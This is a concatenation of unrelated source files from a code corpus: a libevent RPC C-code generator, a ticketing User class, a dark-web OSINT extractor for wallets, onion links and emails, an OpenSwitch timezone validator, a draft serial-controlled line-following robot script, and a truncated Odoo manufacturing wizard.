{"var": var_name, "index": self._index}
)
self._entry.GetVarName = GetVarName
def GetInitializer(self):
return "NULL"
def GetVarName(self, var):
return var
def GetVarLen(self, _var_name):
return "-1"
def GetDeclaration(self, funcname):
"""Allows direct access to elements of the array."""
code = [
"int %(funcname)s(struct %(parent_name)s *, int, %(ctype)s *);"
% self.GetTranslation({"funcname": funcname})
]
return code
def AssignDeclaration(self, funcname):
code = [
"int %s(struct %s *, int, const %s);"
% (funcname, self._struct.Name(), self._ctype)
]
return code
def AddDeclaration(self, funcname):
code = [
"%(ctype)s %(optpointer)s "
"%(funcname)s(struct %(parent_name)s *msg%(optaddarg)s);"
% self.GetTranslation({"funcname": funcname})
]
return code
def CodeGet(self):
code = """int
%(parent_name)s_%(name)s_get(struct %(parent_name)s *msg, int offset,
%(ctype)s *value)
{
if (!msg->%(name)s_set || offset < 0 || offset >= msg->%(name)s_length)
return (-1);
*value = msg->%(name)s_data[offset];
return (0);
}
""" % (
self.GetTranslation()
)
return code.splitlines()
def CodeAssign(self):
code = [
"int",
"%(parent_name)s_%(name)s_assign(struct %(parent_name)s *msg, int off,",
" const %(ctype)s value)",
"{",
" if (!msg->%(name)s_set || off < 0 || off >= msg->%(name)s_length)",
" return (-1);",
"",
" {",
]
code = TranslateList(code, self.GetTranslation())
codearrayassign = self._entry.CodeArrayAssign(
"msg->%(name)s_data[off]" % self.GetTranslation(), "value"
)
code += [" " + x for x in codearrayassign]
code += TranslateList([" }", " return (0);", "}"], self.GetTranslation())
return code
def CodeAdd(self):
codearrayadd = self._entry.CodeArrayAdd(
"msg->%(name)s_data[msg->%(name)s_length - 1]" % self.GetTranslation(),
"value",
)
code = [
"static int",
"%(parent_name)s_%(name)s_expand_to_hold_more("
"struct %(parent_name)s *msg)",
"{",
" int tobe_allocated = msg->%(name)s_num_allocated;",
" %(ctype)s* new_data = NULL;",
" tobe_allocated = !tobe_allocated ? 1 : tobe_allocated << 1;",
" new_data = (%(ctype)s*) realloc(msg->%(name)s_data,",
" tobe_allocated * sizeof(%(ctype)s));",
" if (new_data == NULL)",
" return -1;",
" msg->%(name)s_data = new_data;",
" msg->%(name)s_num_allocated = tobe_allocated;",
" return 0;",
"}",
"",
"%(ctype)s %(optpointer)s",
"%(parent_name)s_%(name)s_add(struct %(parent_name)s *msg%(optaddarg)s)",
"{",
" if (++msg->%(name)s_length >= msg->%(name)s_num_allocated) {",
" if (%(parent_name)s_%(name)s_expand_to_hold_more(msg)<0)",
" goto error;",
" }",
]
code = TranslateList(code, self.GetTranslation())
code += [" " + x for x in codearrayadd]
code += TranslateList(
[
" msg->%(name)s_set = 1;",
" return %(optreference)s(msg->%(name)s_data["
"msg->%(name)s_length - 1]);",
"error:",
" --msg->%(name)s_length;",
" return (NULL);",
"}",
],
self.GetTranslation(),
)
return code
def CodeComplete(self, structname, var_name):
self._index = "i"
tmp = self._entry.CodeComplete(structname, self._entry.GetVarName(var_name))
# skip the whole loop if there is nothing to check
if not tmp:
return []
translate = self.GetTranslation({"structname": structname})
code = [
"{",
" int i;",
" for (i = 0; i < %(structname)s->%(name)s_length; ++i) {",
]
code = TranslateList(code, translate)
code += [" " + x for x in tmp]
code += [" }", "}"]
return code
def CodeUnmarshal(self, buf, tag_name, var_name, _var_len):
translate = self.GetTranslation(
{
"var": var_name,
"buf": buf,
"tag": tag_name,
"init": self._entry.GetInitializer(),
}
)
code = [
"if (%(var)s->%(name)s_length >= %(var)s->%(name)s_num_allocated &&",
" %(parent_name)s_%(name)s_expand_to_hold_more(%(var)s) < 0) {",
' puts("HEY NOW");',
" return (-1);",
"}",
]
# the unmarshal code directly returns
code = TranslateList(code, translate)
self._index = "%(var)s->%(name)s_length" % translate
code += self._entry.CodeUnmarshal(
buf,
tag_name,
self._entry.GetVarName(var_name),
self._entry.GetVarLen(var_name),
)
code += ["++%(var)s->%(name)s_length;" % translate]
return code
def CodeMarshal(self, buf, tag_name, var_name, _var_len):
code = ["{", " int i;", " for (i = 0; i < %(var)s->%(name)s_length; ++i) {"]
self._index = "i"
code += self._entry.CodeMarshal(
buf,
tag_name,
self._entry.GetVarName(var_name),
self._entry.GetVarLen(var_name),
)
code += [" }", "}"]
code = "\n".join(code) % self.GetTranslation({"var": var_name})
return code.split("\n")
def CodeClear(self, structname):
translate = self.GetTranslation({"structname": structname})
codearrayfree = self._entry.CodeArrayFree(
"%(structname)s->%(name)s_data[i]"
% self.GetTranslation({"structname": structname})
)
code = ["if (%(structname)s->%(name)s_set == 1) {"]
if codearrayfree:
code += [
" int i;",
" for (i = 0; i < %(structname)s->%(name)s_length; ++i) {",
]
code = TranslateList(code, translate)
if codearrayfree:
code += [" " + x for x in codearrayfree]
code += [" }"]
code += TranslateList(
[
" free(%(structname)s->%(name)s_data);",
" %(structname)s->%(name)s_data = NULL;",
" %(structname)s->%(name)s_set = 0;",
" %(structname)s->%(name)s_length = 0;",
" %(structname)s->%(name)s_num_allocated = 0;",
"}",
],
translate,
)
return code
def CodeInitialize(self, name):
code = [
"%s->%s_data = NULL;" % (name, self._name),
"%s->%s_length = 0;" % (name, self._name),
"%s->%s_num_allocated = 0;" % (name, self._name),
]
return code
def CodeFree(self, structname):
code = self.CodeClear(structname)
code += TranslateList(
["free(%(structname)s->%(name)s_data);"],
self.GetTranslation({"structname": structname}),
)
return code
def Declaration(self):
dcl = [
"%s *%s_data;" % (self._ctype, self._name),
"int %s_length;" % self._name,
"int %s_num_allocated;" % self._name,
]
return dcl
def NormalizeLine(line):
line = CPPCOMMENT_RE.sub("", line)
line = line.strip()
line = WHITESPACE_RE.sub(" ", line)
return line
ENTRY_NAME_RE = re.compile(r"(?P<name>[^\[\]]+)(\[(?P<fixed_length>.*)\])?")
ENTRY_TAG_NUMBER_RE = re.compile(r"(0x)?\d+", re.I)
def ProcessOneEntry(factory, newstruct, entry):
optional = False
array = False
entry_type = ""
name = ""
tag = ""
tag_set = None
separator = ""
fixed_length = ""
for token in entry.split(" "):
if not entry_type:
if not optional and token == "optional":
optional = True
continue
if not array and token == "array":
array = True
continue
if not entry_type:
entry_type = token
continue
if not name:
res = ENTRY_NAME_RE.match(token)
if not res:
raise RpcGenError(
r"""Cannot parse name: "%s" around line %d""" % (entry, LINE_COUNT)
)
name = res.group("name")
fixed_length = res.group("fixed_length")
continue
if not separator:
separator = token
if separator != "=":
raise RpcGenError(
r'''Expected "=" after name "%s" got "%s"''' % (name, token)
)
continue
if not tag_set:
tag_set = 1
if not ENTRY_TAG_NUMBER_RE.match(token):
raise RpcGenError(r'''Expected tag number: "%s"''' % (entry))
tag = int(token, 0)
continue
raise RpcGenError(r'''Cannot parse "%s"''' % (entry))
if not tag_set:
raise RpcGenError(r'''Need tag number: "%s"''' % (entry))
# Create the right entry
if entry_type == "bytes":
if fixed_length:
newentry = factory.EntryBytes(entry_type, name, tag, fixed_length)
else:
newentry = factory.EntryVarBytes(entry_type, name, tag)
elif entry_type == "int" and not fixed_length:
newentry = factory.EntryInt(entry_type, name, tag)
elif entry_type == "int64" and not fixed_length:
newentry = factory.EntryInt(entry_type, name, tag, bits=64)
elif entry_type == "string" and not fixed_length:
newentry = factory.EntryString(entry_type, name, tag)
else:
res = STRUCT_REF_RE.match(entry_type)
if res:
# References another struct defined in our file
newentry = factory.EntryStruct(entry_type, name, tag, res.group("name"))
else:
raise RpcGenError('Bad type: "%s" in "%s"' % (entry_type, entry))
structs = []
if optional:
newentry.MakeOptional()
if array:
newentry.MakeArray()
newentry.SetStruct(newstruct)
newentry.SetLineCount(LINE_COUNT)
newentry.Verify()
if array:
# We need to encapsulate this entry into a struct
newentry = factory.EntryArray(newentry)
newentry.SetStruct(newstruct)
newentry.SetLineCount(LINE_COUNT)
newentry.MakeArray()
newstruct.AddEntry(newentry)
return structs
def ProcessStruct(factory, data):
tokens = data.split(" ")
# First three tokens are: 'struct' 'name' '{'
newstruct = factory.Struct(tokens[1])
inside = " ".join(tokens[3:-1])
tokens = inside.split(";")
structs = []
for entry in tokens:
entry = NormalizeLine(entry)
if not entry:
continue
# It's possible that new structs get defined in here
structs.extend(ProcessOneEntry(factory, newstruct, entry))
structs.append(newstruct)
return structs
C_COMMENT_START = "/*"
C_COMMENT_END = "*/"
C_COMMENT_START_RE = re.compile(re.escape(C_COMMENT_START))
C_COMMENT_END_RE = re.compile(re.escape(C_COMMENT_END))
C_COMMENT_START_SUB_RE = re.compile(r"%s.*$" % (re.escape(C_COMMENT_START)))
C_COMMENT_END_SUB_RE = re.compile(r"%s.*$" % (re.escape(C_COMMENT_END)))
C_MULTILINE_COMMENT_SUB_RE = re.compile(
r"%s.*?%s" % (re.escape(C_COMMENT_START), re.escape(C_COMMENT_END))
)
CPP_CONDITIONAL_BLOCK_RE = re.compile(r"#(if( |def)|endif)")
INCLUDE_RE = re.compile(r'#include (".+"|<.+>)')
def GetNextStruct(filep):
global CPP_DIRECT
global LINE_COUNT
got_struct = False
have_c_comment = False
data = ""
while True:
line = filep.readline()
if not line:
break
LINE_COUNT += 1
line = line[:-1]
if not have_c_comment and C_COMMENT_START_RE.search(line):
if C_MULTILINE_COMMENT_SUB_RE.search(line):
line = C_MULTILINE_COMMENT_SUB_RE.sub("", line)
else:
line = C_COMMENT_START_SUB_RE.sub("", line)
have_c_comment = True
if have_c_comment:
if not C_COMMENT_END_RE.search(line):
continue
have_c_comment = False
line = C_COMMENT_END_SUB_RE.sub("", line)
line = NormalizeLine(line)
if not line:
continue
if not got_struct:
if INCLUDE_RE.match(line):
CPP_DIRECT.append(line)
elif CPP_CONDITIONAL_BLOCK_RE.match(line):
CPP_DIRECT.append(line)
elif PREPROCESSOR_DEF_RE.match(line):
HEADER_DIRECT.append(line)
elif not STRUCT_DEF_RE.match(line):
raise RpcGenError("Missing struct on line %d: %s" % (LINE_COUNT, line))
else:
got_struct = True
data += line
continue
# We are inside the struct
tokens = line.split("}")
if len(tokens) == 1:
data += " " + line
continue
if tokens[1]:
raise RpcGenError("Trailing garbage after struct on line %d" % LINE_COUNT)
# We found the end of the struct
data += " %s}" % tokens[0]
break
# Remove any comments, that might be in there
data = re.sub(r"/\*.*\*/", "", data)
return data
def Parse(factory, filep):
"""
Parses the input file and returns C code and corresponding header file.
"""
entities = []
while 1:
# Just gets the whole struct nicely formatted
data = GetNextStruct(filep)
if not data:
break
entities.extend(ProcessStruct(factory, data))
return entities
class CCodeGenerator(object):
def __init__(self):
pass
@staticmethod
def GuardName(name):
# Use the complete provided path to the input file, with all
# non-identifier characters replaced with underscores, to
# reduce the chance of a collision between guard macros.
return "EVENT_RPCOUT_%s_" % (NONIDENT_RE.sub("_", name).upper())
def HeaderPreamble(self, name):
guard = self.GuardName(name)
pre = """
/*
* Automatically generated from %s
*/
#ifndef %s
#define %s
""" % (
name,
guard,
guard,
)
if HEADER_DIRECT:
for statement in HEADER_DIRECT:
pre += "%s\n" % statement
pre += "\n"
pre += """
#include <event2/util.h> /* for ev_uint*_t */
#include <event2/rpc.h>
"""
return pre
def HeaderPostamble(self, name):
guard = self.GuardName(name)
return "#endif /* %s */" % (guard)
@staticmethod
def BodyPreamble(name, header_file):
global _NAME
global _VERSION
slash = header_file.rfind("/")
if slash != -1:
header_file = header_file[slash + 1 :]
pre = """
/*
* Automatically generated from %(name)s
* by %(script_name)s/%(script_version)s. DO NOT EDIT THIS FILE.
*/
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <event2/event-config.h>
#include <event2/event.h>
#include <event2/buffer.h>
#include <event2/tag.h>
#if defined(EVENT__HAVE___func__)
# ifndef __func__
# define __func__ __func__
# endif
#elif defined(EVENT__HAVE___FUNCTION__)
# define __func__ __FUNCTION__
#else
# define __func__ __FILE__
#endif
""" % {
"name": name,
"script_name": _NAME,
"script_version": _VERSION,
}
for statement in CPP_DIRECT:
pre += "%s\n" % statement
pre += '\n#include "%s"\n\n' % header_file
pre += "void event_warn(const char *fmt, ...);\n"
pre += "void event_warnx(const char *fmt, ...);\n\n"
return pre
@staticmethod
def HeaderFilename(filename):
return ".".join(filename.split(".")[:-1]) + ".h"
@staticmethod
def CodeFilename(filename):
return ".".join(filename.split(".")[:-1]) + ".gen.c"
@staticmethod
def Struct(name):
return StructCCode(name)
@staticmethod
def EntryBytes(entry_type, name, tag, fixed_length):
return EntryBytes(entry_type, name, tag, fixed_length)
@staticmethod
def EntryVarBytes(entry_type, name, tag):
return EntryVarBytes(entry_type, name, tag)
@staticmethod
def EntryInt(entry_type, name, tag, bits=32):
return EntryInt(entry_type, name, tag, bits)
@staticmethod
def EntryString(entry_type, name, tag):
return EntryString(entry_type, name, tag)
@staticmethod
def EntryStruct(entry_type, name, tag, struct_name):
return EntryStruct(entry_type, name, tag, struct_name)
@staticmethod
def EntryArray(entry):
return EntryArray(entry)
class CommandLine(object):
def __init__(self, argv=None):
"""Initialize a command-line to launch event_rpcgen, as if
from a command-line with CommandLine(sys.argv). If you're
calling this directly, remember to provide a dummy value
for sys.argv[0]
"""
global QUIETLY
self.filename = None
self.header_file = None
self.impl_file = None
self.factory = CCodeGenerator()
parser = argparse.ArgumentParser(
usage="%(prog)s [options] rpc-file [[h-file] c-file]"
)
parser.add_argument("--quiet", action="store_true", default=False)
parser.add_argument("rpc_file", type=argparse.FileType("r"))
args, extra_args = parser.parse_known_args(args=argv)
QUIETLY = args.quiet
if extra_args:
if len(extra_args) == 1:
self.impl_file = extra_args[0].replace("\\", "/")
elif len(extra_args) == 2:
self.header_file = extra_args[0].replace("\\", "/")
self.impl_file = extra_args[1].replace("\\", "/")
else:
parser.error("Spurious arguments provided")
self.rpc_file = args.rpc_file
if not self.impl_file:
self.impl_file = self.factory.CodeFilename(self.rpc_file.name)
if not self.header_file:
self.header_file = self.factory.HeaderFilename(self.impl_file)
if not self.impl_file.endswith(".c"):
parser.error("can only generate C implementation files")
if not self.header_file.endswith(".h"):
parser.error("can only generate C header files")
def run(self):
filename = self.rpc_file.name
header_file = self.header_file
impl_file = self.impl_file
factory = self.factory
declare('Reading "%s"' % filename)
with self.rpc_file:
entities = Parse(factory, self.rpc_file)
declare('... creating "%s"' % header_file)
with open(header_file, "w") as header_fp:
header_fp.write(factory.HeaderPreamble(filename))
# Create forward declarations: allows other structs to reference
# each other
for entry in entities:
entry.PrintForwardDeclaration(header_fp)
header_fp.write("\n")
for entry in entities:
entry.PrintTags(header_fp)
entry.PrintDeclaration(header_fp)
header_fp.write(factory.HeaderPostamble(filename))
declare('... creating "%s"' % impl_file)
with open(impl_file, "w") as impl_fp:
impl_fp.write(factory.BodyPreamble(filename, header_file))
for entry in entities:
entry.PrintCode(impl_fp)
def main(argv=None):
try:
CommandLine(argv=argv).run()
return 0
except RpcGenError as e:
sys.stderr.write(e)
except EnvironmentError as e:
if e.filename and e.strerror:
sys.stderr.write("%s: %s" % (e.filename, e.strerror))
elif e.strerror:
sys.stderr.write(e.strerror)
else:
raise
return 1
if __name__ == "__main__":
sys.exit(main(argv=sys.argv[1:]))
| 2.125 | 2 |
ticketing_system/domain/user.py | Uncensored-Developer/ticketing_system | 1 | 12761542 | from .base import Base
class User(Base):
def __init__(self, token, email, user_type, name):
self.token = token
self.email = email
self.user_type = user_type
self.name = name
@classmethod
def from_dict(cls, adict):
return cls(
token=adict['token'],
email=adict['email'],
user_type=adict['user_type'],
name=adict['name']
)
def to_dict(self):
return {
'token': self.token,
'email': self.email,
'user_type': self.user_type,
'name': self.name
}
def __eq__(self, other):
return self.to_dict() == other.to_dict()
| 3.25 | 3 |
Darkweb/ScanningTheDarkWeb/WebScraper/torexplorer/extractors.py | catalyst256/CyberNomadResources | 20 | 12761543 | <filename>Darkweb/ScanningTheDarkWeb/WebScraper/torexplorer/extractors.py
import re
import validators
from torexplorer.helpers import validate_bitcoin_wallet
import hashlib
import requests
from torexplorer import settings as settings
def extract_crypto_wallets(html):
# ethereum = re.compile(r'(0x[a-fA-F0-9]{40})', re.DOTALL | re.MULTILINE)
# dogecoin = re.compile(r'D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}', re.DOTALL | re.MULTILINE)
# monero = re.compile(r'4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}', re.DOTALL | re.MULTILINE)
bitcoin = re.compile(r'([1,3][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{26,35})', re.MULTILINE | re.DOTALL)
bitcoins = []
coins = set(re.findall(bitcoin, html))
for coin in coins:
if validate_bitcoin_wallet(coin):
bitcoins.append(coin)
return bitcoins
def extract_onion_links(html):
try:
short = re.compile(r'[a-z2-7]{16}\.onion', re.DOTALL | re.MULTILINE)
longer = re.compile(r'[a-z2-7]{56}\.onion', re.DOTALL | re.MULTILINE)
links = re.findall(short, html)
links.extend(re.findall(longer, html))
return set(links)
except:
return None
def extract_email_addresses(html):
email = re.compile(r'([\w.-]+@[\w.-]+\.\w+)', re.MULTILINE)
emails = set(re.findall(email, html))
valid = []
for e in emails:
if '.png' in e:
pass
elif validators.email(e):
valid.append(e)
return valid
def extract_pgp_blocks(html):
pgp = re.compile(r"(-----BEGIN [^-]+-----[A-Za-z0-9+\/=\s]+-----END [^-]+-----)", re.MULTILINE)
return re.findall(pgp, html)
# Thanks to @jms_dot_py for this code
def extract_google_codes(html):
extracted_codes = []
google_adsense_pattern = re.compile(r"pub-[0-9]{1,}", re.IGNORECASE)
google_analytics_pattern = re.compile(r"ua-\d+-\d+", re.IGNORECASE)
extracted_codes.extend(google_adsense_pattern.findall(html))
extracted_codes.extend(google_analytics_pattern.findall(html))
extracted_codes = list(dict.fromkeys(extracted_codes))
return extracted_codes
# Variables for requests made outside of scraper
headers = {'User-Agent': settings.USER_AGENT}
proxies = {'http': settings.HTTP_PROXY, 'https': settings.HTTP_PROXY}
def find_favicon_hash(website):
hash = hashlib.md5()
url = '{0}/favicon.ico'.format(website)
resp = requests.get(url, headers=headers, proxies=proxies)
if resp and resp.status_code == 200:
hash.update(resp.content)
return hash.hexdigest()
else:
return None
def find_robots_information(website):
url = '{0}/robots.txt'.format(website)
resp = requests.get(url, headers=headers, proxies=proxies)
if resp and resp.status_code == 200:
disallow = []
lines = resp.text.split('\n')
for line in lines:
if 'Disallow' in line:
disallow.append(line)
robots = list(filter(None, [str(i.split(': ')[1]).strip('\r').rstrip('/') for i in disallow]))
return robots | 2.484375 | 2 |
opsplugins/system.py | OpenSwitchNOS/openswitch-ops-sysd | 0 | 12761544 | #!/usr/bin/env python
# Copyright (C) 2016 Hewlett Packard Enterprise Development LP
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from opsvalidator.base import BaseValidator
from opsvalidator import error
from opsvalidator.error import ValidationError
from opsrest.utils.utils import get_column_data_from_row
import os
from copy import copy
global list_of_timezones
list_of_timezones = None
def build_timezone_db():
global list_of_timezones
path = "/usr/share/zoneinfo/posix/"
for root, directories, filenames in os.walk(path):
for filename in filenames:
full_path = os.path.join(root, filename)
timezone = copy(full_path)
timezone = timezone.replace(path, "")
list_of_timezones[timezone] = full_path
def check_valid_timezone(timezone_user_input):
global list_of_timezones
if list_of_timezones is None:
list_of_timezones = {}
build_timezone_db()
if timezone_user_input in list_of_timezones.keys():
return True
else:
return False
class SystemValidator(BaseValidator):
resource = "system"
def validate_modification(self, validation_args):
system_row = validation_args.resource_row
if hasattr(system_row, "timezone"):
timezone = get_column_data_from_row(system_row, "timezone")[0]
if (check_valid_timezone(timezone) is False):
details = "Invalid timezone %s." % (timezone)
raise ValidationError(error.VERIFICATION_FAILED, details)
| 2.296875 | 2 |
week2/testing_session2_draft/QRLineDetectorAngle.py | SR42-dev/path-following-robot-color-detection-plus-gsheets-api-comms | 0 | 12761545 | <gh_stars>0
from pyzbar.pyzbar import decode
import cv2
import numpy as np
import math
import serial
import time
ser = serial.Serial('COM3', baudrate = 9600, timeout = 1)
def write_read(x):
x = str(x)[2]
ser.write(bytes(x, 'utf-8'))
time.sleep(0.05)
data = ser.readline()
return data
def barcodeReader(image):
img = image
cv2.imshow("Image", img)
detectedBarcodes = decode(img)
if not detectedBarcodes:
print("Barcode Not Detected or your barcode is blank/corrupted!")
cv2.imshow("Image", img)
else:
for barcode in detectedBarcodes:
(x, y, w, h) = barcode.rect
cv2.rectangle(img, (x - 10, y - 10),
(x + w + 10, y + h + 10),
(0, 0, 255), 5)
if barcode.data != " ":
dir1 = barcode.data
print(str(dir1)[2])
while True:
value = write_read(dir1)
break
cv2.imshow("Image", img)
print(value)
return value
cap = cv2.VideoCapture(0)
cap.set(3,1280)
cap.set(4,720)
#hsv lower and upper values for a yellow ball used for testing. Values found using trackbars.
path_lower = np.array([115,35,60])
path_upper = np.array([133,255,255])
font = cv2.FONT_HERSHEY_COMPLEX
kernel = np.ones((5,5),np.uint8)
skew_value = 15
f_dist = 200*3
while True:
ret, frame = cap.read()
if not ret:
cap = cv2.VideoCapture(0)
continue
(h, w) = frame.shape[:2]
blur = cv2.GaussianBlur(frame,(5,5),cv2.BORDER_DEFAULT)
hsvvid = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)
path_mask = cv2.inRange(hsvvid, path_lower, path_upper)
opening = cv2.morphologyEx(path_mask, cv2.MORPH_OPEN, kernel)
erosion = cv2.erode(opening,kernel,iterations = 1)
dilation = cv2.dilate(erosion,kernel,iterations = 5)
path_contours, hierarchy = cv2.findContours(dilation, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cv2.drawContours(frame, path_contours, -1, (0,255,0), 3)
if len(path_contours) > 0:
largest = max(path_contours, key = cv2.contourArea)
x_2, y_2, w_2, h_2 = cv2.boundingRect(largest)
cv2.rectangle(frame, (x_2, y_2), (x_2 + w_2, y_2 + h_2), (0, 0, 255), 3)
error = x_2 + (w_2/2) - w/2
#cv2.putText(frame, str(error), (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
blackbox = cv2.minAreaRect(largest)
(x_min, y_min), (w_min, h_min), ang = blackbox
if ang > 45:
ang = ang - 90
if w_min < h_min and ang < 0:
ang = 90 + ang
if w_min > h_min and ang > 0:
ang = ang - 90
ang = int(ang)
box = cv2.boxPoints(blackbox)
box = np.int0(box)
cv2.drawContours(frame, [box], 0, (0,0,255), 3)
#cv2.putText(frame, str(ang), (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
if error != 0:
error_angle = abs((180/math.pi)*math.asin(abs(error)/f_dist)/error)*error
else:
error_angle = 0
a_delay = (100/skew_value)*(ang + error_angle)
a_delay = int(a_delay)
#cv2.putText(frame, str(a_delay), (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
ser.write(str(a_delay).encode())
if barcodeReader(frame) == '' : # edit string to contain qrcode data, case - switch to left track
i = 'l' # edit to go to track on left
ser.write(i.encode())
print('go left')
left_text = 'Go left'
cv2.putText(frame, left_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
time.sleep(abs(a_delay) / 1000)
elif barcodeReader(frame) == '' : # edit string to contain qrcode data, case - switch to right track
i = 'r' # edit to go to track on right
ser.write(i.encode())
print('go right')
left_text = 'Go right'
cv2.putText(frame, left_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
time.sleep(abs(a_delay) / 1000)
elif barcodeReader(frame) == '' : # edit string to contain qrcode data, case - go to center
i = 'r' # edit to go to center
ser.write(i.encode())
print('go right')
left_text = 'Go right'
cv2.putText(frame, left_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
time.sleep(abs(a_delay) / 1000)
elif barcodeReader(frame) == '' : # edit string to contain qrcode data, case - stop
i = '' # edit to stop
ser.write(i.encode())
print('stop')
left_text = 'stop'
cv2.putText(frame, left_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
time.sleep(abs(a_delay) / 1000)
elif a_delay < -20:
i = 'l'
ser.write(i.encode())
print('go left')
left_text = 'Go left'
cv2.putText(frame, left_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
time.sleep(abs(a_delay)/1000)
elif a_delay > 20:
i = 'r'
ser.write(i.encode())
print('go right')
right_text = 'Go right'
cv2.putText(frame, right_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
time.sleep(abs(a_delay)/1000)
else:
i = 'f'
ser.write(i.encode())
print('go straight')
straight_text = 'Go straight'
cv2.putText(frame, straight_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
time.sleep(0.1)
else:
i = 'r'
ser.write(i.encode())
print('go right')
straight_text = 'Go right'
cv2.putText(frame, straight_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
time.sleep(0.1)
cv2.imshow('path video', frame)
key = cv2.waitKey(1)
if key == 27: #press esc to exit
break
cap.release()
cv2.destroyAllWindows()
| 2.75 | 3 |
apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/addons/mrp/wizard/mrp_product_produce.py | gtfarng/Odoo_migrade | 1 | 12761546 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from datetime import datetime
from odoo import api, fields, models, _
from odoo.addons import decimal_precision as dp
from odoo.exceptions import UserError
from odoo.tools import float_compare, float_round
class MrpProductProduce(models.TransientModel):
_name = "mrp.product.produce"
_description = "Record Production"
@api.model
def default_get(self, fields):
res = super(MrpProductProduce, self).default_get(fields)
if self._context and self._context.get('active_id'):
production = self.env['mrp.production'].browse(self._context['active_id'])
#serial_raw = production.move_raw_ids.filtered(lambda x: x.product_id.tracking == 'serial')
main_product_moves = production.move_finished_ids.filtered(lambda x: x.product_id.id == production.product_id.id)
serial_finished = (production.product_id.tracking == 'serial')
serial = bool(serial_finished)
if serial_finished:
quantity = 1.0
else:
quantity = production.product_qty - sum(main_product_moves.mapped('quantity_done'))
quantity = quantity if (quantity > 0) else 0
lines = []
existing_lines = []
for move in production.move_raw_ids.filtered(lambda x: (x.product_id.tracking != 'none') and x.state not in ('done', 'cancel')):
if not move.move_lot_ids.filtered(lambda x: not x.lot_produced_id):
qty = quantity / move.bom_line_id.bom_id.product_qty * move.bom_line_id.product_qty
if move.product_id.tracking == 'serial':
while float_compare(qty, 0.0, precision_rounding=move.product_uom.rounding) > 0:
lines.append({
'move_id': move.id,
'quantity': min(1,qty),
'quantity_done': 0.0,
'plus_visible': True,
'product_id': move.product_id.id,
'production_id': production.id,
})
qty -= 1
else:
lines.append({
'move_id': move.id,
'quantity': qty,
'quantity_done': 0.0,
'plus_visible': True,
'product_id': move.product_id.id,
'production_id': production.id,
})
else:
existing_lines += move.move_lot_ids.filtered(lambda x: not x.lot_produced_id).ids
res['serial'] = serial
res['production_id'] = production.id
res['product_qty'] = quantity
res['product_id'] = production.product_id.id
res['product_uom_id'] = production.product_uom_id.id
res['consume_line_ids'] = map(lambda x: (0,0,x), lines) + map(lambda x:(4, x), existing_lines)
return res
serial = fields.Boolean('Requires Serial')
production_id = fields.Many2one('mrp.production', 'Production')
product_id = fields.Many2one('product.product', 'Product')
product_qty = fields.Float(string='Quantity', digits=dp.get_precision('Product Unit of Measure'), required=True)
product_uom_id = fields.Many2one('product.uom', 'Unit of Measure')
lot_id = fields.Many2one('stock.production.lot', string='Lot')
consume_line_ids = fields.Many2many('stock.move.lots', 'mrp_produce_stock_move_lots', string='Product to Track')
product_tracking = fields.Selection(related="product_id.tracking")
@api.multi
def do_produce(self):
# Nothing to do for lots since values are created using default data (stock.move.lots)
moves = self.production_id.move_raw_ids
quantity = self.product_qty
if float_compare(quantity, 0, precision_rounding=self.product_uom_id.rounding) <= 0:
raise UserError(_('You should at least produce some quantity'))
for move in moves.filtered(lambda x: x.product_id.tracking == 'none' and x.state not in ('done', 'cancel')):
if move.unit_factor:
rounding = move.product_uom.rounding
move.quantity_done_store += float_round(quantity * move.unit_factor, precision_rounding=rounding)
moves = self.production_id.move_finished_ids.filtered(lambda x: x.product_id.tracking == 'none' and x.state not in ('done', 'cancel'))
for move in moves:
rounding = move.product_uom.rounding
if move.product_id.id == self.production_id.product_id.id:
move.quantity_done_store += float_round(quantity, precision_rounding=rounding)
elif move.unit_factor:
# byproducts handling
move.quantity_done_store += float_round(quantity * move.unit_factor, precision_rounding=rounding)
self.check_finished_move_lots()
if self.production_id.state == 'confirmed':
self.production_id.write({
'state': 'progress',
'date_start': datetime.now(),
})
return {'type': 'ir.actions.act_window_close'}
@api.multi
def check_finished_move_lots(self):
lots = self.env['stock.move.lots']
produce_move = self.production_id.move_finished_ids.filtered(lambda x: x.product_id == self.product_id and x.state not in ('done', 'cancel'))
if produce_move and produce_move.product_id.tracking != 'none':
if not self.lot_id:
raise UserError(_('You need to provide a lot for the finished product'))
existing_move_lot = produce_move.move_lot_ids.filtered(lambda x: x.lot_id == self.lot_id)
if existing_move_lot:
existing_move_lot.quantity += self.product_qty
existing_move_lot.quantity_done += self.product_qty
else:
vals = {
'move_id': produce_move.id,
'product_id': produce_move.product_id.id,
'production_id': self.production_id.id,
'quantity': self.product_qty,
'quantity_done': self.product_qty,
'lot_id': self.lot_id.id,
}
lots.create(vals)
for move in self.production_id.move_raw_ids:
for movelots in move.move_lot_ids.filtered(lambda x: not x.lot_produced_id):
if movelots.quantity_done and self.lot_id:
#Possibly the entire move is selected
remaining_qty = movelots.quantity - movelots.quantity_done
if remaining_qty > 0:
